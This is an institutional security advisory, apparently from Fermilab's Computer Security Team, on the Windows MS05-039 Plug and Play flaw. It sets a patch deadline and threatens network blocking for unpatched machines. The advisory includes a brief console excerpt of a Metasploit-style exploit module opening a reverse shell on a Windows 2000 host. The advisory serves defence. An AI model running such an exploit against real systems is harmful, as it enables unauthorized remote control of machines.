Critical Vulnerability: MS05-039 (899588) Windows Plug-n-Play

Microsoft released a patch for MS05-039 (899588) Plug and Play (http://www.microsoft.com/technet/security/bulletin/MS05-039.mspx).
There is a working exploit for Windows 2000 systems, with a universal exploit for Windows XP SP1/SP2 and 2003 Server. This exploit permits an attacker to get an interactive shell:

% ms05_039_pnp(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Detected a Windows 2000 target (XXXXXX.fnal.gov)
[*] Sending the final DCE fragment
[*] Got connection from 131.225.x.x:1234 <-> 131.225.y.y:2345

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

Because this vulnerability permits very easy remote exploitation and allows for a Local System shell, it has been declared Critical by Fermilab Computer Security. Since there is a working exploit, and it has been incorporated into at least one worm (Zotob.A) and a bot (W32/Sdbot.worm), Windows systems must have this patch applied by August 24, 2005. At that time, unpatched systems will be blocked from network access until remediated. Be aware that if this exploit is distributed in an active mass-spreading worm, this date may be moved up a bit.

For assistance contact helpdesk@fnal.gov.
Information compiled and maintained by Computer Security Team; last modified by TR on July 13, 2006.
(Address comments about page to the Computer Security Team.)